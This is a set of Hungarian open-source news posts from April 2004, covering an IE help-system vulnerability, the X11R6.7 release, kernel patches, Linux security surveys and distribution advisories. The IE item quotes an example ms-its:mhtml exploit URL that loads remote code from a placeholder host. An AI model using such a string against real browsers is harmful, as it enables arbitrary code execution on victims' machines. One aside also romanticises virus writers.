Új sebezhetőséget fedeztek fel a biztosággal foglalkozó szakemberek a minap a Windows operációs rendszerek help rendszerében. A CERT jelentése szerint a jelentős hibának minősíthető sebezhetőség azokat érinti, akik Internet Exploler böngészőt vagy Outlook levelezőt használnak. A hibára jelenleg javítás és vírus definíciós file nincs, viszont exploit az már van ``in wild'', azaz közkézen. A CERT szerint minden olyan Windows rendszer érintett a hibában amelyik Internet Explolert futtat. A hiba egy ún. ``cross-domain scripting vulnerability'' az IE-ben, amely lehetővé teszi a támadónak, hogy tetszőleges kódot futtasson annak a felhasználónak a neve alatt, amely az IE-t futtatja (ami tapasztalataim szerint számos esetben a ``administrator'' felhasználó - trey).



A ``támadó'' oldal vagy levél az alábbihoz hasonló üzenetet tartalmazhat:


ms-_its:mhtml:file://C:
osuchfile_mht!http://www.example.com//exploit_chm::exploit_html



Nem csak az IE böngészőt használók érintettek, hanem azok is akik Outlook alatt HTML tartalmú leveleket olvasnak (pl. spam-ok, hírlevelek, stb.).

Van workaround a hibára. Registry módosítással (ITS protocol handlers letiltással), és az IE böngésző biztonsági szintjének emelésével (pl. Active-X letiltással, azzal, hogy nem clikk-elük bejövő email-re, instant üzenetekre, web fórumokon található linkekre, Internet relay chat (IRC) csatornák linkjeire, stb.) segíthetünk magunkon.

Szerintem egyszerűbb Mozillát használni :-)

A hiba bejelentése itt.

Poul-Henning Kamp (phk@FreeBSD.org) - ismert FreeBSD kernel hacker, akinek az elmúlt 10 évben több, mint 3600 commit fűzödik nevéhez a FreeBSD kernel CVS-ben - segítséget kér ahhoz, a következő hónapokban teljes időben a FreeBSD kernel fejlesztésén dolgozhasson.Ahogy a hacker írja, elvesztette az egyik nagy ügyfelét, amelynek következtében a 2004-es évének második fele munka szempontjából teljesen üresen áll. Mivel két gyereke és jelzáloga van, ezért munka után kell néznie.

Ő szeretne a FreeBSD kernelen dolgozni teljes idejében mintegy 6 hónapon keresztül, de ehhez támogatásra van szüksége.

Amit kér:

DK33000/hó (dán korona) ($5500/€4500) minimum 3 hónapon keresztül, maximum 6 hónapra. Amennyiben a támogatás létrejön, akkor a kernel hacker azon fog dolgozni, hogy a FreeBSD filerendszerét és diszk-I/O alrendszerét tökéletesítse.

Ha a minimális 99000 dán korona nem jön össze, akkor nem tud nekiállni a projektnek.

Támogatni a Paypal-on keresztül lehet a hackert. Ha nem jön össze a kellő pénz, akkor az átutalt pénzt a hacker vagy visszaküldi az adományozóknak, vagy a FreeBSD Foundation-nak továbbítja (kérés szerint), és munkát fog keresni.

A részleteket megtudhatod Poul-Henning Kamp FAQ-jából itt.

Az OSNews egy áttekintést készített a napokban megjelent GNOME 2.6 desktop és fejlesztői környezetről. A cikk írója nem a végleges verziót elemezte ki, hanem a kicsit korábban megjelent, a Fedora Core 2 test 1 rendszerben található -rc verziót.

A cikk írója szerint a mostani kiadás volt a legnagyobb ugrás az összes nagyobb GNOME release között (GNOME 2.4-ről -> 2.6-ra). Szerinte két dologra vártak a legjobban az emberek.



Az egyik, hogy megjelent a GTK 2.4, és szinte az egész GNOME 2.6 használja azt. A másik pedig a ``térbeli'' Nautilus, amely új értelmet ad az eddigi megszokott desktop környezetben való navigálás fogalmának.

A négy oldalas beszámolót megtalálod itt.

A GlobeandMail cikkében arra keresi a választ, hogy ahogy nő a Linux operációs rendszer széles körű elfogadottsága és felhasználói bázisa, vajon úgy fognak tömegesen megjelenni a vírusok is rá? Egyre több ártó program fog érkezni a sötét oldalról?Több ``szakértő'' is megszólal a cikkben. Elmondják, hogy szerintük azért van jelenleg kevesebb vírus Linuxra, és több Windowsra, mert a Windows-nak nagyobb a telepített bázisa, több felhasználója van, és így a vírusok nagyobb kárt tudnak okozni, mintha azokat Linuxra írnák meg.

Ross Chevalier, a Novell Canada embere szerint a valószínűleg Microsoft Outlook a legnagyobb vírusgazda, a legelső számú célpontja a vírusoknak és férgeknek.

A Guardian Digital Inc. embere azt állítja, hogy Linuxra már most is vannak linuxos vírusok, és szerinte ezek száma meg fog nőni. Gondolom örülne is neki, hiszen cége ebből él. Biztnsági szoftvereket fejlesztenek Linuxra.

A Symantec vírusírtót gyártó cég embere szerint a windowsos vírusok száma nem véletlenül nagyobb. A Windows operációs rendszer sokkal jobban standardizáltabb, mint a Linux disztribútorok rendszerei (gondoljunk arra, hogy ahány terjesztés, annyi féle megvalósítás, mindegyik hasonló, de mégis más. máshogy oldja meg a Red Hat, a SuSE vagy a Debian ugyanazon feladatokat), így egy egységes felületre könnyebb vírusokat írni, és azon sikereket elérni, mintha ugyanazon vírust, meg kellene írni úgy, hogy az maximális ártó hatást fejtsen ki mondjuk a N+1 Linux disztribúción.

A Novell és a Guardian Digital embere egyetértett abban, hogy a Linux biztonságosabb, mint a Windows, feltehetően azért mert több közös vonást is tartalmaz a UNIX-szal és a korábbi Multics-szal, amelyek multi-user környezetek voltak a kezdetekől, ellentétben a Windows-szal, amely a DOS egyfelhasználós operációs rendszerből indult (itt nyilván még a rési Win3.x, Win9x, WinME rendszerekre gondolhattak).

A Windows embere persze ezzel nem értett egyet azzal, hogy a Linux sokkal biztonságosabb lenne.

A cikkben még szerepel az, hogy a Linux nyílt kódja kétélű fegyver, hiszen hozzáférhetnek a jó szándékú programozók éppúgy, mint a rossz szándékúak is.

A cikket megtalálod itt.

Szerintem egy dolgot kifelejtettek a vírusírók motivációi közül. Elfeledkeztek a fanatikus techno gerillákról, akik csak azért írnak vírusokat az ``ellenség'' operációs rendszereire, hogy annak erkölcsi és (közvetve) anyagi károkat okozzanak, mert szeretnék, hogy megdőljön a több évtizede tartó monopólium, amely meggátolja a technikai fejlődést. Az ember alapvetően szabadságban szeret élni, és alapvetően ódzkodik azoktól a dolgoktól, amelyeket erőszakkal le akarnak nyomni a torkán.

A fenti címet adta az Economist.com annak a cikkének és az illusztrációnak, amely a nemrég létrejött Microsoft - Sun szövetséget jellemzi. Az írás nem nélkülöz irónikus felhangokat sem. A cikk írója a Rabin-Arafat kézfogáshoz hasonlította a két IT cég vezetőjének megegyezését.

Az újságíró csodálozik McNealy-n, hiszen az korábban ellenségnek tekintette a redmondi céget. Ahogy írja McNealy nem sajnálta a negatív jelzőket korábban, volt ott minden: Microsoft, mint ``dark side'' vagy éppen ``evil empire''. A Windows operációs rendszer mint ``a giant hairball'', de Steve Ballmer az MS első embere és Bill Gates sem úszta meg korábban, nekik kijutott a ``Ballmer and Butt-Head'' jelző.

A cikket megtalálod itt.

Vajon a pénz képes ennyire megváltoztatni az embereket?

Megjelent a NetBSD projekt szokásos negyedéves státusz jelentése. Belőle tájékozódhatunk a projekttel kapcsolatos, előző 3 hónapban történt eseményekről.

A tartalomból:

- a NetBSD projekt befogadta az Xfree 4.4.0-át, mert nem talált a licencben kivetni való dolgot (?)

- NetBSD logo tervező pályázat

- új NetBSD/xen port

- frissített IPFilter (4.1.1)
- megjelent a NetBSD 1.6.2

- importálásra került a gcc 3.3.3

- elindult a NetBSD 2.0 RelEng folyamat

A státusz jelentést elolvashatod itt.

Biztos többen belefutottak már abba a problémába, hogy a fetchmailt jó lenne valahogyan arra rábírni, hogy a leveleket dinamikus időközönként töltse le, és ne a fetchmailrcben megadott -nak megfelelő periódusonként. Alapból ugyebár fix időközönként kéri le a leveleket, megoldás lehet a fetchmailrc cserélgetése a fetchmail újraindításával egybekötve. Van azonban egy egyszerű megoldás, amivel kicsit kényelmesebben lehet a fetchmailt 'noszogatni'.A megoldás részletesen megtalálható itt: http://linux.zsolt.net/descriptions/fetchmail.php . Már hetek óta tesztelem a módszert, és teljesen jól működik. Gondoltam megosztom másokkal is, hátha valaki hasznát veszi rajtam kívül is. :-)

ui.: Vajh miért nem engedi az URL-t megadni linkben? A "description"-nel van baja?

Az FSF.hu Alapítvány pályázatot írt ki az OpenOffice.org honosításával és magyar nyelvű dokumentálásával kapcsolatos munkákra. A részletek: itt.

Ma kaptam meg a Michael's Minute új számát... A tárgy általában a Lindows.com, vagy a LindowsOS reklámozása, de most már a cím is érdekelt.Michael említi, hogy a Microsoft névváltást akart elérni a Lindows.com-mal szemben 2 évvel ezelőtt az USA-ban, de az nem sikerült. Most az MS a világ több pontján próbálkozik hasonló perekkel. Mivel Európában többször is alulmaradt (Svédország, Hollandia) a Lindows.com, úgy gondolták, hogy nevet váltanak az európai országokban. Viszont úgy okoskodtak, hogy nem valami jó az, ha egyazon terméknek minden országban más a neve, ezért ismét nevet fognak változtatni (ezúttal globálisan) (Az Egyesült Államokban továbbra is Lindows Inc. lesz a cég neve, de az országon kívül más nevet fognak választani).



Az új nevet nem említi (bár azt mondja, hogy a lindos, tetszik neki, mert lehetne az új szlogen az, hogy ``a W okozott minden problámát" :-), de azt írja, április 14-én lehull a lepel, majd megkezdődik a átállás az új névre (weboldalak, termékek).



Michael azt írja, április 14-én 1:00 után ugorjunk rá a honlapra, és meglátjuk az új nevet.



A teljes írás megtalálható itt.

Sziasztok! Elkészült a Szünetmentes tápegység HOGYAN fordítása
a Magyar LDP kiadásában,
az FSF.hu Alapítvány támogatásával.Üdv.


dacas



Megjegyzés:
html (azonnal olvasható) |
html.tar.gz |
txt.gz |
pdf.gz



Egyéb HOGYANok kereshetők és megtekinthetők a HOGYAN-INDEXben.

Az X.Org Foundation bejelentése szerint megjelent az X Window System X11R6.7-es verziója. A The X.Org Foundation (X.Org alapítvány) nem más, mint az X Consortium jogutódja. Tagjai közt számos nevezetes XFree86 Project tag is található.

A jelenlegi kiadás kódja nem más, mint a legutolsó, a megváltozott licenc előtti XFree86 forrásfa forkja. Mivel az új licencel érkező Xfree86 4.4.0-át számos Linux disztribútor (Mandrake, Gentoo, Debian, SuSE) és az OpenBSD-sek is elutasították, könnyen lehet, hogy ez a forrásfa lesz az alapértelmezett X11 megoldás sok felhasználó számára.

A bejelentés:

X.Org Foundation Announces Formation and First Release

The new X.Org Foundation will help drive the X Window System to support

state-of-the-art desktop technologies

San Francisco, CA., April 6, 2004 - X.Org Foundation today announces their first release of the X Window System since the formation of the Foundation in January of this year. The new X.Org release, called X Window System Version 11 Release 6.7 (X11R6.7), builds on the work of the X.Org X11R6.6 and XFree86TM Project Inc. V4.4RC2 releases to combine many of the latest developments from a large number of the participants and companies working with the X Window community. The X Window System X11R6.7 release can be found at http://www.x.org/.

We have made great progress in creating a framework upon which further development of the X Window System can be based, agreed the Interim Board of the Foundation. We expect to provide the desktop community with at least two more releases of the X Window System before the end of this year to encompass all of the new technologies and ideas that we are developing.

This release marks the return to community development of the X Window System under governance open to all contributors for the first time since the founding of the X Consortium in 1988, said Jim Gettys, co-founder of the X Window System, Interim X.Org Foundation board member and member of the research staff of HP Labs.

We welcome the formation of the X.Org Foundation and are looking forward to support this group to bring the work on the X Window System to a new technological level, said Egbert Eich, X Window System developer at Novell's SUSE LINUX business unit.

Matthias Ettrich, Director of Software Development at Trolltech, said As a multi-platform GUI toolkit vendor, we appreciate the value of a powerful underlying windowing system, and as such, we are excited about the direction X.Org is heading. We are very much looking forward to supporting new technologies around X, and we will do our share to make the advances of the platform accessible to software developers.

Being an underlying technology to the most popular desktops on all GNU Systems, in particular GNOME and KDE, the X Window System is indeed an essential part of most Free Software operating systems, said Georg C.F. Greve, president of the FSF Europe. It helps many users to access and enjoy the freedom of Free Software. We are glad that X.Org will from now on watch over this enabling technology.

Red Hat is pleased to be working with the new X.Org Foundation to build a vibrant open source community around X Window System innovation. Look for X11R6.7 in the upcoming Fedora Core 2 and future Red Hat Enterprise Linux products, said Havoc Pennington, desktop development manager at Red Hat.

As one of the largest GNU/Linux distribution projects in the world, the Debian Project is delighted to see that freedom and diversity are alive and well in the X technology sector. We're also delighted that the X.Org Foundation is dedicated to retaining the licensing model that has made the X Window System an enduring success, said Branden Robinson of the Debian GNU/Linux Project. Like us, the X.Org Foundation is a member-driven organization devoted to Free Software. We cannot help but be enthusiastic about them and the work they're doing for the X Window System and Free Software communities alike.

An open source project works best with a large community of active contributors. OSI welcomes the return of X to open source development by the entire community. I'm looking forward to contributing myself, said Russell Nelson, Vice-President of the Open Source Initiative.

Cygwin/X is benefiting heavily from the community-building spirit of the X.Org Foundation and their open development environment. We are pleased to be basing our releases on the good work of the X.Org Foundation, said Harold L Hunt II of the Cygwin/X project.

The XonX Project is very pleased that the X.Org Foundation has been eager to support Darwin and Mac OS X. X11R6.7 adds new features that will be appreciated by many Mac OS X users, said Torrey Lyons, XonX Project Founder.

Membership of the X.Org Foundation is free to all participants. Applications for membership are now being accepted, and active participants in the further development of the X Window System are invited to visit: http://www.x.org/XOrg_Foundation_Membership.html to complete a membership application. Participation in the Foundations Sponsor Group is also available to those who wish to financially support the activities The X.Org Foundation. Current Sponsors include Hewlett Packard, IBM, and SUN Microsystems.

About The Foundation Release

X11R6.7 is the first official X.Org Foundation release. It is the successor release to X11R6.6 from X.Org. To assure consistency with industry and community requirements and practices, it was developed from the X.Org X11R6.6 code base and the XFree86 V4.4RC2 code base, with the addition of bug fixes and enhancements. These enhancements include: new IPv6 functionality, Freetype V2.1.7, fontconfig V2.2.2, Xft V2.1.6, Xcursor V1.1.2, and Xrender V0.8.4, with corresponding changes in documentation and notices. Additional source and binary releases are anticipated during 2004.

About The X Window System

The X Window System provides the only common networked windowing environment bridging the heterogeneous platforms in today's computing. The X Window System is one of the most successful open-source, collaborative technologies developed to date and is the standard graphical window system for the Linux and UNIX operating systems. The inherent independence of the X Window System from the operating system, the network and the hardware, as well as its successful interoperability, have made it widely available and deployed with more than 30 million users worldwide. All major hardware vendors support the X Window System and many third parties provide technologies for integrating X Window System applications into the networked computer or personal computer environments including Microsoft Windows, UNIX, Linux and Mac OS X. Further, thousands of software developers provide X Window System applications, and with the continued growth of Linux and the emergence of Mac OS X, the number of users is growing rapidly.

About X.Org Foundation

X.Org Foundation L.L.C. is a recently formed Delaware company organized to operate as a scientific charity under IRS code 501(c)(3), chartered to develop and execute effective strategies that provide worldwide stewardship of the X Window System technology and standards. The group is currently managed by an Interim Board of Directors that includes: Stuart Anderson (Free Standards Group), Egbert Eich (SUSE), Jim Gettys (HP), Georg Greve (Free Software Foundation Europe), Stuart Kreitman (SUN Microsystems), Kevin Martin (Red Hat), Jim McQuillan (Linux Terminal Server Project), Leon Shiman (Shiman Associates) and Jeremy White (Code Weavers). The website for the X.Org Foundation can be found at http://www.x.org/.

Note to editors: UNIX is a registered trademark of The Open Group in the US and other countries. LINUX is a registered trademark of Linus Torvalds. XFree86 is a trademark of The XFree86 Project, Inc. Microsoft and Windows are registered trademarks of Microsoft Corporation in the United States and/or other countries. Mac OS is a registered trademark of Apple Computer, Inc., registered in the U.S. and other countries. All other company names are trademarks of the registered owners.

$"

A Kerneltrap interjút készített Ryan McBride-dal, azzal a hackerrel, akik teljes időben az OpenBSD fejlesztésén dolgozik. Ryan első OpenBSD-s munkája az volt, hogy IPv6 támogatást készített a PF-hez, az OpenBSD állapottartó csomagszűrőjéhez. Újabban a CARP (Common Address Redundancy Protocol) elsőszámú fejlesztője.

Az interjúban a hacker beszél a CARP fejlesztéséről, és elmagyarázza, hogy az hogy működik. Beszél a szabadalmakról és bonyodalmakról (Cisco) amelyek a CARP-pal kapcsolatosak, valamint kitér arra is, hogy folyamatban van a CARP más operációs rendszerekre való portolása is. Végül beszél azokról az új funkciókról, amelyek a május 1-re várható OpenBSD 3.5-ben bukkannak majd fel.

Az interjút elolvashatod itt.

Az első RFC-t (Request For Comments) a mai napon, de 35 évvel ezelőtt, 1969. április 7-én pubilkálta Steve Crocker, és az Arpanet működéséről szólt.

GLSA 200404-01 Insecure sandbox temporary lockfile vulnerabilities in Portage

GLSA 200404-02 KDE Personal Information Management Suite Remote Buffer Overflow Vulnerability

GLSA 200404-03 Tcpdump Vulnerabilities in ISAKMP Parsing

GLSA 200404-04 Multiple vulnerabilities in sysstat

Szerver-áthelyezés miatt ma 15 órától előreláthatólag legfeljebb 1 órán keresztül nem lesz elérhető a hup.hu.
A kiesés időtartamát igyekszem a lehető legkisebbre szorítani.

Köszönöm a türelmeteket.

Andrew kiadta a 2.6.5-ös stabil kernelhez a második -mc és -mm patcheket.

Linux 2.6.5-mc2:

-------------------

Ez a kernelfa a gyűjtőhelye azoknak a patcheknek, amelyek Linus beolvasztására várnak. A jelenlgi patchben a PPC64, Dokumentáció, NFS, Video, filerendszer (ext3 gyorsítás, reiserfs javítás), SELinux (ipv6) részek frissültek/kerültek javításra.

A változások listája AKPM levelében itt.

Linux 2.6.5-mm2:

-------------------- Az -mm2 patchben beolvasztásra kerültek Ian Kent autofs4 patchei, és ezen kívül különböző javítások, gyorsítások, kódtisztítási munkák kerültek bele. Az -mm2 természetesen tartalmazza az összes olyan patchet is, amely az -mc2-ben megtalálható.

A változások listája AKPM levelében itt.

A kernel patcheléshez segítséget itt találsz.

Megjelent a Debian közösség szokásos heti hírlevelének, a DWN-nek az ez évi 14. száma.

A tartalomból:

``Windows vagy Linux: melyik biztonságosabb?" - ilyen elcsépelt címmel futó felmérést minden évben készít valamelyik nagy elemzőcég. Hogy miért? Mert a siker tuti, 100% biztos, hogy egy hétig mindenki róluk beszél majd.

Ezt a tényt ismerve a Forrester Research ebben az évben is készített ilyen felmérést. Pár nappal ezelőtt volt olvasható a külföldi oldalakon, és meg is volt a várt eredménye, lehetett róla flamelni.

Annyira nagy port kavart a felmérés, hogy a nagy Linux disztribútorok - amelyeknek "terméke" egyébként részt vett a felmérésben - összefogtak, és egy válasz nyilatkozatot tettek közzé közösen.A Forrester, hogy felmérje a Windows és a Linux biztonságosságát, összegyűjtötte a rendszereket érintő, publikusan hozzáférhető hibajelentéseket. A Linux disztribúciók közül a Debian, Red Hat, SuSE, és MandrakeSoft disztrói szerepeltek a felmérésben. Összeszedték a Bugtraq-on, a bugzilla.org-on, a CERT/CC-n (Carnegie Mellon) 2002. június 1-e és 2003. május 31-e között megjelent biztonsági figyelmeztetéseket, majd felállítottak egy kiértékelő rendszert. A kiértékelésnél figyelembe vették a "days of risk" (a hiba bejelentésétől számított napok száma addig, amíg a patch meg nem jelenik) értéket, és a megpatchelt hibák százalékos értékét.

Az eredmény meglepő volt szerintük, a kapott számadatok azt mutatták, hogy a Microsoft végezte a legjobb munkát, ők patchelték leggyorsabban a hibákat. A felmérés eredménye regisztrálás után hozzáférhető itt.

Erre a felmérésre reagáltak a nagy disztribútorok. A reakciót el lehet olvasni itt.

[2004. ápr. 06.] DSA-476 heimdal - cross-realm sebezhetőség

[2004. ápr. 06.] DSA-477 xine-ui - nem biztonságos átmeneti fájlok

[2004. ápr. 06.] DSA-478 tcpdump - távoli DoS sebezhetőség

A frissítésről szóló FAQ-nk.

Megjegyzés: a tcpdump sebezhetőség még nem került ki a helyére, addig is a hibaleírás innen elérhető.

'A Linux nem lehet alacsony költségű alternatívája a UNIX vagy Windows rendszereknek nagyvállalati környezetben'

A bostoni Yankee Group névre hallgató kutató és tanácsadó cég legújabb felmérése szerint a rendszeradminisztrátorok és c-szintű vezetők körében végzett felmérés azt mutatja, hogy e két csoport jó véleménnyel van a Linuxról.

Szerintük a Linux kiváló teljesítményt, megbízhatóságot, könnyű felhasználhatóságot és biztonságot nyújt. Viszont az elismerő szavak ellenére úgy gondolják, hogy a Linux felhasználásnak vannak gyenge oldalai is...Szerintük nagyvállalati környezetben a Linux rendszerek tömeges telepítése vagy a teljes áttérés Windows környezetről Linuxra három-négyszer többe kerül, és háromszor annyi időt vesz igénybe, mintha egy régebbi Windows verzióról egy újabb Windows verzióra frissítene a cég. - vonta le a következtetést Laura DiDio a Yankee Group rangidős elemzője.

Bővebben itt.

Április 1-i tréfának indult, de könnyen lehet, hogy végleg bezárt az egyetlen OpenBSD-s híreket szolgáltató oldal, a Deadly.org. James R. Phillips bejelentésében az áll, hogy megfáradt, így az oldal befejezi működését. Többen 4/1 tréfára gyanakodtak, de most, hogy 5 nappal a "bolondok napja" után sincs új tartalom az oldalon az elgondolkodtató. Az oldalon le van tiltva a hozzászólási lehetőség is.

Személy szerint remélem, hogy valóban csak tréfáról van szó (bár annak kicsit sokáig tart).

Vannak azonban olyanok, akik nem optimisták, és egy új OpenBSD-s oldal is indulófélben van, betöltendő a Deadly.org megszűnése (?) után maradó űrt.

Az új oldal a obsdj.baselabs.org helyen érhető el.

[2004. ápr. 05.] DSA-475 linux-kernel-2.4.18-hppa - különböző sebezhetőségek

[2004. ápr. 03.] DSA-474 squid - ACL bypass

[2004. ápr. 03.] DSA-473 oftpd - denial of service

[2004. ápr. 03.] DSA-472 fte - különböző sebezhetőségek

A frissítésről szóló FAQ-nk itt.

Megjelent a Gentoo közösség heti hírlevelének, a GWN-nek az ez évi 13. száma.

A hírlevelet elolvashatod itt.

A tartalomból röviden:

A Yahoo-n jelent meg egy cikk a fenti címmel, amely a 2.6-os kernelben található "új" IO ütemező, az anticipatory IO scheduler nagyszerű tulajdonságait taglalja.Mint az ismert, a 2.5-ös fejlesztői kernelben jelent meg először (2003. júliusában korábbi cikk) Nick Piggin anticipatory IO ütemezője, amely hamarosan az alapértelmezett IO scheduler lett a 2.5/2.6-os kernelben. Ez az ütemező a korábbi deadline IO ütemezőt váltotta fel. A deadline ütemező sem tűnt el, továbbra is a kernel része. A felhasználó döntheti el, hogy melyik IO ütemezőt szeretné használni.

A kiválasztás egyszerű: bootolás során paraméterként meg lehet adni a kernelnek, hogy melyik IO ütemezőt használja.

Példa:

Linux elevator=deadline (a régi ütemező indul)

Ha nem adunk meg elevator paramétert, akkor az alapértelmezett anticipatory scheduler indul el.

Az anticipatory IO scheduler egyik hasznos tulajdonsága, hogy bizonyos workloadok esetén akár 1000% gyorsabb lehet, mint a korábbi implementáció.



A cikket megtalálod itt.



Kapcsolódó HUP cikkek itt.

Marcelo kiadta a 2.4.26-os kernel második kiadára jelölet verzióját. Benne ACPI, hálózati, IDE, XFS, stb. frissítések találhatók.